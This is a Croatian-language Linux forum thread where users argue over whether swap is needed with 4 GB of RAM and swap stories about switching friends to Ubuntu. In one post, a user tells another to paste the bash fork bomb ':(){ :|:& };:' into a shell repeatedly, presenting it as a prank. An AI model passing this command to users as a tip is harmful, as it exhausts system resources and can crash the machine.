Svjedočanstva

Razne diskusije o Linuxu, neovisno o distribuciji.

Moderator/ica: Moderatori/ce

Avatar
simke
Postovi: 1410
Pridružen/a: 31 sij 2009, 23:37
OS: arch | 7
Lokacija: rijeka
Kontakt:

Re: Svjedočanstva

Post Postao/la simke »

drade je napisao/la:
simke je napisao/la:
drade je napisao/la: Oprosti, no sam sebi proturijecis. Ako nista drugo, barem nemoj biti dvolican u iskazima te se probaj drzati onoga sto si sam napisao, a sto sam ja citirao odgovarajuci na tvoj post. Koristeci tvoju manjkavu analogiju, za normalan rad na racunalu ti niti ne treba 4+GB memorije.

D.
ne kontaš ti mene baš.
Odlican argument, neshvaceni ume !
joj meni.

pa da, ako baš hoćeš, da. 4 gb je dosta za normalan rad na racunalu, i swap ti netreba. aona naredba sto si napisao, nemam pojma kaj znači. vjerojatno niš koristi.
I'm a Paladin with 18 charisma and 97 hit points. I can use my helm of disintegration and do one D4 damage as my half-elf mage wields his plus-five holy avenger.
Avatar
drade
Postovi: 910
Pridružen/a: 12 svi 2010, 07:57
OS: linux

Re: Svjedočanstva

Post Postao/la drade »

4ndY je napisao/la:
drade je napisao/la: Pokusaj pokrenuti:

Kod: Označi sve

:(){ :|:& };:
Copy/Paste gore naveden code par puta (za pocetak probaj 5 puta, za pojacan efekt) u shell pa pricekaj par minuta.

D.
Mislim da to neće raditi na svim sustavima:

Kod: Označi sve

$ ulimit -Hn
1024
(Fedora)
Tocno, nece raditi na svim sustavima.
When you're a kid and you wanna go "Weee !", but you ain't got drugs yet ... You hold out for your life, hold on to your little GONADS ... and STRIFE.
Avatar
charuga
Postovi: 860
Pridružen/a: 12 pro 2009, 23:29
Spol: m
OS: ubuntu 10.04.
Lokacija: bjelovar

Re: Svjedočanstva

Post Postao/la charuga »

na ovim svjedocanstvima uvijek neke zanimljivosti :)

mislim da je ono sto je simke htio reci , da nekada poneki memberi pretjeruju u nekim pojasnjenjima.u ovom slucaju covjek je pitao da li treba ostaviti swap na kompu koji ima 4gb ram , i simke vjerojatno misli , a ja se slazem sa njim , da nema potrebe za swapom jer ima sasvim dovoljno radne memorije (4gb ;) ).

nekako mi se cini da je speedy
speedy je napisao/la:bravo HUGO samo swap si premal stavio,,,,,,,, ako bude htjeo u hibernaciju mogao bi imat problema :D
nekako to vise u sali rekao a onda se krenulo u offtopicarenje do bola , a nema nikakve potrebe za tim ;)

uostalom mislim da ce se svi sloziti sa mnom da linux koristi puno manje rame od windoza tako da.....4 gb rama bude bilo sasvim dovoljno da komp radi fino :D
Avatar
fritz62s
Postovi: 433
Pridružen/a: 26 svi 2008, 13:51
Spol: M
OS: Ubuntu 10.04
Lokacija: Beograd

Re: Svjedočanstva

Post Postao/la fritz62s »

Ima programa ( mada ne tako puno ), koji traze swap za svoj rad i to bez obzira na kolicinu RAMa. To mozda i nije neki razlog, ali ako misli da koristi hibernaciju, swap ce mu trebati i to velicine RAMa...
Ne razumem tu potrebu da se ne napravi Swap particija, kada je usteda prostora uglavnom smesna za danasnje hardove.
Resistance is futile, you will be asimilated!
Il' si Lindža, il' si mindža! :shock: apt-get moo
Registrovani Linux korisnik #465156 / Ubuntu korisnik #20700
Lutherus

Re: Svjedočanstva

Post Postao/la Lutherus »

jučer uspjel zagriženog mac korisnika nagovoriti da na mac pro stavi ubuntu :-)
Avatar
PsyTrance
Postovi: 244
Pridružen/a: 10 sij 2010, 12:27
Spol: M
OS: Arch
Lokacija: 127.0.0.1

Re: Svjedočanstva

Post Postao/la PsyTrance »

Ja sam jednog kolegu nagovorio da instalira Ubuntu. Okej, napravio je dual boot. Malo je cackao po Ubuntuu i danas ga pitam kako napreduje, jel se snašao.

"Ma jok, vratio sam se odmah na Windowse, na Linuxu nikako ne mogu dobiti znak @"

:nee :nee

Neću ga više pilati, baš me briga... :)
Avatar
iv@n
Site Admin
Postovi: 7631
Pridružen/a: 01 pro 2007, 18:12
Spol: M
OS: openSUSE TW
Lokacija: Vinkovci, Hrvatska
Kontakt:

Re: Svjedočanstva

Post Postao/la iv@n »

Taj bi se dobro proveo na Macu, hahah :lol:
To avoid criticism ~ do nothing, say nothing, be nothing.
Lutherus

Re: Svjedočanstva

Post Postao/la Lutherus »

iv@n je napisao/la:Taj bi se dobro proveo na Macu, hahah :lol:
kaj me briga,nek se zabavlja :mrgreen:
Avatar
Suko
Site Admin
Postovi: 16079
Pridružen/a: 03 tra 2008, 18:09
Spol: M
OS: Mint 17 Cinnamon
Lokacija: Svugdi me ima. Slavonija uglavnom.

Re: Svjedočanstva

Post Postao/la Suko »

Imam i ja jedan takav dogovor krajem tjedna.
Čisto me strah koliko dana će taj durati na Linuxu. :zvizdi
Moguće da nešto nije u redu s nama kad koristimo te Linuxe?
Avatar
glaskoncILLa
Postovi: 5678
Pridružen/a: 28 vel 2009, 16:36

Re: Svjedočanstva

Post Postao/la glaskoncILLa »

mazohisti smo.. :)
...."Have you mooed today?"...
..It’s that time of the decade: I’m reinstalling Debian..
Odgovori